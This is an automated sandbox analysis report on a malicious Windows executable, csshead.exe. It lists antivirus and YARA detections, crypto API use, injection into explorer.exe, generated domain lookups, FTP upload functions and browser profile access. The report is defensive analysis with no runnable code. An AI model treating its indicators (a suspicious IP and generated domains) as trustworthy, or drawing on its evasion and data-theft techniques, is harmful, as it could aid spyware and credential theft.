Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:56388
Start time:13:59:12
Joe Sandbox Product:Cloud
Start date:04.07.2018
Overall analysis duration:0h 14m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:csshead.exe
Cookbook file name:default.jbs
Analysis system description:W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.spyw.troj.winEXE@3/14@37/4
HCA Information:
  • Successful, ratio: 61%
  • Number of executed functions: 112
  • Number of non-executed functions: 234
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 33% (good quality ratio 29.4%)
  • Quality average: 80.6%
  • Quality standard deviation: 32.6%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: csshead.exeAvira: Label: TR/Spy.Bebloh.ymgcn
Multi AV Scanner detection for submitted fileShow sources
Source: csshead.exevirustotal: Detection: 46%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 0.2.csshead.exe.50000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 1.2.explorer.exe.490000.5.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 1.2.explorer.exe.7c0000.6.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 0.2.csshead.exe.400000.1.unpackAvira: Label: HEUR/AGEN.1023574
Source: 0.0.csshead.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 0.1.csshead.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Yara signature matchShow sources
Source: 00000001.00000002.28504861757.007C0000.00000040.sdmp, type: MEMORYMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 00000000.00000002.27490223943.00050000.00000004.sdmp, type: MEMORYMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 0.2.csshead.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 0.2.csshead.exe.50000.0.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 1.2.explorer.exe.7c0000.6.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 1.2.explorer.exe.7c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
Source: 0.2.csshead.exe.50000.0.raw.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004017A2 CryptDecrypt,CryptDecrypt,0_2_004017A2
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0040153C CryptGenRandom,CryptGenRandom,0_2_0040153C
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401402 CryptHashData,CryptHashData,0_2_00401402
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004017A4 CryptDecrypt,CryptDecrypt,0_2_004017A4
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401AAE CryptEncrypt,CryptEncrypt,0_2_00401AAE
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004017E8 CryptAcquireContextA,CryptAcquireContextA,0_2_004017E8
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401574 CryptSetKeyParam,CryptSetKeyParam,0_2_00401574
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401AB0 CryptEncrypt,CryptEncrypt,0_2_00401AB0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401374 CryptCreateHash,CryptCreateHash,0_2_00401374
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004018A0 CryptImportKey,CryptImportKey,0_2_004018A0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004014D0 CryptDestroyHash,CryptDestroyHash,0_2_004014D0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401490 CryptGetHashParam,CryptGetHashParam,0_2_00401490
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401404 CryptHashData,CryptHashData,0_2_00401404
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401AF8 CryptDestroyKey,CryptDestroyKey,0_2_00401AF8
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401B20 CryptReleaseContext,CryptReleaseContext,0_2_00401B20
Source: C:\Windows\explorer.exeCode function: 1_2_007C17E8 CryptAcquireContextA,CryptAcquireContextA,1_2_007C17E8
Source: C:\Windows\explorer.exeCode function: 1_2_007C18A0 CryptImportKey,CryptImportKey,1_2_007C18A0
Source: C:\Windows\explorer.exeCode function: 1_2_007C153C CryptGenRandom,CryptGenRandom,1_2_007C153C
Source: C:\Windows\explorer.exeCode function: 1_2_007C17A4 CryptDecrypt,CryptDecrypt,1_2_007C17A4
Source: C:\Windows\explorer.exeCode function: 1_2_007C1574 CryptSetKeyParam,CryptSetKeyParam,1_2_007C1574
Source: C:\Windows\explorer.exeCode function: 1_2_007C1AB0 CryptEncrypt,CryptEncrypt,1_2_007C1AB0
Source: C:\Windows\explorer.exeCode function: 1_2_007C1404 CryptHashData,CryptHashData,1_2_007C1404
Source: C:\Windows\explorer.exeCode function: 1_2_007C1374 CryptCreateHash,CryptCreateHash,1_2_007C1374
Source: C:\Windows\explorer.exeCode function: 1_2_007C17A2 CryptDecrypt,CryptDecrypt,1_2_007C17A2
Source: C:\Windows\explorer.exeCode function: 1_2_007C1B20 CryptReleaseContext,CryptReleaseContext,1_2_007C1B20
Source: C:\Windows\explorer.exeCode function: 1_2_007C1402 CryptHashData,CryptHashData,1_2_007C1402
Source: C:\Windows\explorer.exeCode function: 1_2_007C1AAE CryptEncrypt,CryptEncrypt,1_2_007C1AAE
Source: C:\Windows\explorer.exeCode function: 1_2_007C1490 CryptGetHashParam,CryptGetHashParam,1_2_007C1490
Source: C:\Windows\explorer.exeCode function: 1_2_007C1AF8 CryptDestroyKey,CryptDestroyKey,1_2_007C1AF8
Source: C:\Windows\explorer.exeCode function: 1_2_007C14D0 CryptDestroyHash,CryptDestroyHash,1_2_007C14D0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004018A0 CryptImportKey,CryptImportKey,0_2_004018A0
Source: C:\Windows\explorer.exeCode function: 1_2_007C18A0 CryptImportKey,CryptImportKey,1_2_007C18A0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: csshead.exe, 00000000.00000002.27490890262.00599000.00000004.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Drops certificate files (DER)Show sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821Jump to dropped file
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64BJump to dropped file
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08Jump to dropped file
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9311CC87BA03C7CB180095ACB967E37Jump to dropped file

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 4x nop then pop ecx0_2_00409178
Source: C:\Users\user\Desktop\csshead.exeCode function: 4x nop then pop ecx0_2_00409147
Source: C:\Windows\explorer.exeCode function: 4x nop then pop ecx1_2_007C9178
Source: C:\Windows\explorer.exeCode function: 4x nop then pop ecx1_2_007C9147

Networking:

barindex
Queries random domain names (often used to prevent blacklisting and sinkholes)Show sources
Source: unknownDNS traffic detected: English language letter occurancy does not match the domain names
Tries to resolve many domain names, but no domain seems validShow sources
Source: unknownDNS traffic detected: query: nvxij5qutl.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rmqgc5frw3.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zqvdnvokoq.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pmtz1iirvr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tdgku3qbl1r.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ktchyigkk2iwi3.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gdelzlc224n5q9.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: s4v3xhn3swcbmbc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: phyrnfojfwiyuz.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hdylvm3db3ixvi.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: e45cukuntbcou.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: r5hfff2lnn9mn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: titz9qqc5szt.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: fcs1fscxh2oa.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gj2pexhfy95v.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hp1sofo5bnc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tmmq5lcauha.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hvzaduc42t2o.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gvyn4bo2n3qq.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hs1agojraguo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: erz5yxeblneu.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zo4q11gk3iyjgw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 5v95xlfdzrj1de.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 4yony3itl9losv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tyou23hsrm.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: j4rjf2dtjl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: n5k2ekq2ro.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: jdf2xx9wetn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 5julzwwlbkrgvm.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: b1l41m3rggg5nz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: cwug3djg3reoa9.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ushy2wtgwvny.com replaycode: Name error (3)
Connects to many different domainsShow sources
Source: unknownNetwork traffic detected: DNS query count 36
Contains functionality to upload files via FTPShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco0_2_00419D20
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 23.10.249.152 23.10.249.152
Source: Joe Sandbox ViewIP Address: 23.10.249.152 23.10.249.152
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\explorer.exeCode function: 1_2_007C15B0 InternetReadFile,1_2_007C15B0
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: ocsp.pki.goog
Source: global trafficHTTP traffic detected: GET /GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2B HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: ocsp.pki.goog
Source: global trafficHTTP traffic detected: GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: ocsp.int-x3.letsencrypt.org
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.google.com
Urls found in memory or binary dataShow sources
Source: E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08.1.drString found in binary or memory: http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUx
Source: F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B.1.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndn
Source: CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821.1.drString found in binary or memory: http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBq
Source: csshead.exe, explorer.exeString found in binary or memory: https://
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\p61isjuj.default\prefs.jsJump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401928 LoadLibraryA,GetProcAddress,0_2_00401928
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0040949C push 004094C8h; ret 0_2_004094C0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004094E0 push 00409506h; ret 0_2_004094FE
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0040103C push 00401068h; ret 0_2_00401060
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0040107C push 004010A8h; ret 0_2_004010A0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00429267 push ebx; ret 0_2_00429268
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00434271 push eax; retf 0_2_00434272
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00429F35 push ecx; ret 0_2_00429F48
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00434F2B pushad ; iretd 0_2_00434F2C
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00432D21 pushfd ; retf 0043h0_2_00432D22
Source: C:\Windows\explorer.exeCode function: 1_2_007C949C push 007C94C8h; ret 1_2_007C94C0
Source: C:\Windows\explorer.exeCode function: 1_2_007C103C push 007C1068h; ret 1_2_007C1060
Source: C:\Windows\explorer.exeCode function: 1_2_007C107C push 007C10A8h; ret 1_2_007C10A0
Source: C:\Windows\explorer.exeCode function: 1_2_007C94E0 push 007C9506h; ret 1_2_007C94FE
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00403988 FindFirstFileA,FindClose,0_2_00403988
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405640
Source: C:\Windows\explorer.exeCode function: 1_2_007C5640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,1_2_007C5640
Source: C:\Windows\explorer.exeCode function: 1_2_007C3988 FindFirstFileA,FindClose,1_2_007C3988

System Summary:

barindex
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00404E94 NtQueryInformationProcess,ReadProcessMemory,0_2_00404E94
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00408A48 PostQuitMessage,NtdllDefWindowProc_A,0_2_00408A48
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00404DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,0_2_00404DE0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00408A44 NtdllDefWindowProc_A,0_2_00408A44
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00410210 NtdllDefWindowProc_A,0_2_00410210
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00421360 NtdllDefWindowProc_A,0_2_00421360
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00410190 IsWindow,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A,0_2_00410190
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00417E60 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A,0_2_00417E60
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0041E9C0 SendMessageA,IsWindow,IsWindow,IsWindow,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A,0_2_0041E9C0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00417ED0 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,lstrlen,SetWindowLongA,NtdllDefWindowProc_A,0_2_00417ED0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00418620 NtdllDefWindowProc_A,0_2_00418620
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00410810 NtdllDefWindowProc_A,0_2_00410810
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00421620 NtdllDefWindowProc_A,0_2_00421620
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00418190 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,SysFreeString,lstrlen,SysFreeString,SetWindowLongA,SysFreeString,NtdllDefWindowProc_A,0_2_00418190
Source: C:\Windows\explorer.exeCode function: 1_2_007C8A48 PostQuitMessage,NtdllDefWindowProc_A,1_2_007C8A48
Source: C:\Windows\explorer.exeCode function: 1_2_007C4E94 NtQueryInformationProcess,ReadProcessMemory,1_2_007C4E94
Source: C:\Windows\explorer.exeCode function: 1_2_007C4DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,1_2_007C4DE0
Source: C:\Windows\explorer.exeCode function: 1_2_007C8A44 NtdllDefWindowProc_A,1_2_007C8A44
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00405D200_2_00405D20
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00419D200_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0041C95B0_2_0041C95B
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0043256D0_2_0043256D
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00430D580_2_00430D58
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00423AD00_2_00423AD0
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004308070_2_00430807
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004302B60_2_004302B6
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0042E76B0_2_0042E76B
Source: C:\Windows\explorer.exeCode function: 1_2_007C5D201_2_007C5D20
PE file contains strange resourcesShow sources
Source: csshead.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: csshead.exe, 00000000.00000001.27391130383.00456000.00000008.sdmpBinary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe
Source: csshead.exeBinary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\csshead.exeFile read: C:\Users\user\Desktop\csshead.exeJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Source: C:\Users\user\Desktop\csshead.exeSection loaded: open.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spyw.troj.winEXE@3/14@37/4
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00419D20 